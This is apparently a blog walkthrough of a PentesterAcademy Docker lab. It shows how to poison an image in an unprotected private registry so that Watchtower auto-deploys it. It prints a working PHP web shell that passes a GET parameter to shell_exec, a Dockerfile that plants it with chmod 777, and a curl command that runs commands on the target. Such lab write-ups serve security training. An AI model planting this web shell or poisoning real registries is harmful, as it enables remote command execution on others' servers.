Corrupting Source Image – Docker

Hello Friends, In this post, I’ll share with you, how I solve PentesterAcademy Corrupting Source Image Docker Lab.

Scenario: The target docker server is running a webserver image that is serving on port 80. The docker image used for the webserver is stored on the unprotected private docker registry present on the same network. A watchtower instance deployed on the target server ensures that the latest image present in the private repository is used for the webserver container. A flag is mounted from the host machine into /tmp directory of the webserver container.

In the /etc/hosts file there is targetserver and registry address, registry:5000 is the address where all images are stored.

By doing, curl to targetserver on port 80, it reveals that it running a WordPress website.

if we check for available images in the registry, we found that there are 4 images including WordPress.

Let’s pull the WordPress image from registry:5000

after that, we will run this image in detached mode, and after that in interactive mode.

now, if we see in /tmp folder, we didn’t find that flag, for that, we can create a new modified WordPress docker image and add a web shell to it.

Creating a shell.php, Dockerfil, and building it.

root@localhost# vim shell.php

<?php
$result=shell_exec($_GET["cmd"]);
echo $result;
?>
root@localhost# vim Dockerfile

FROM registry:5000/wordress

COPY shell.php /app/

RUN chmod 777 /app

Now, our web shell is added to the new WordPress image, now we will wait for some time for the watchtower to auto-deploy our image, after 2-3 minutes if we curl to targetserver with id command we can see the reply coming.

root@localhost# curl "targetserver/shell.php?cmd=id"

now if we do ls to /tmp, we can see that, there is a flag.

If you face any problems with this challenge, let me know in the comment section.

Leave a Reply

Your email address will not be published. Required fields are marked *